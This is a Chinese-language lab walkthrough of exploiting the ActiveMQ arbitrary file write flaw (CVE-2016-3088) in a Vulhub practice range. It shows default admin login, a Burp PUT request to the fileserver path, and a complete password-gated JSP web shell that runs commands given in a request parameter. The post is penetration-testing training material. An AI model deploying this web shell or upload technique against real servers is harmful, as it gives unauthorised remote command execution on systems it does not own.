Vulhub靶场已经搭建完成,可以正式进行渗透测试的练习了。
本篇的内容是完成ActiveMQ任意文件写入漏洞(CVE-2016-3088)
ActiveMQ介绍:Apache ActiveMQ是Apache软件基金会所研发的开放源代码消息中间件;由于ActiveMQ是一个纯Java程序,因此只需要操作系统支持Java虚拟机,ActiveMQ便可执行。
本篇我就先进行一次完整的实验过程,然后再按照自己的理解来详细讲解。
实验步骤
1.进入ActiveMQ靶站
实验需要进行登录,点击“Manage ActiveMQ broker”,登录,账号密码都是admin,进入之后效果如下:
2.然后进入首页下的fileserver这个文件夹里
bp抓包(刷新一下页面就行),然后send to repeater,改成put方法,写入shell,代码如下:
<%
if("023".equals(request.getParameter("pwd"))){
java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("i")).getInputStream();
int a = -1;
byte[] b = new byte[2048];
out.print("<pre>");
while((a=in.read(b))!=-1){
out.println(new String(b));
}
out.print("</pre>");
}
%>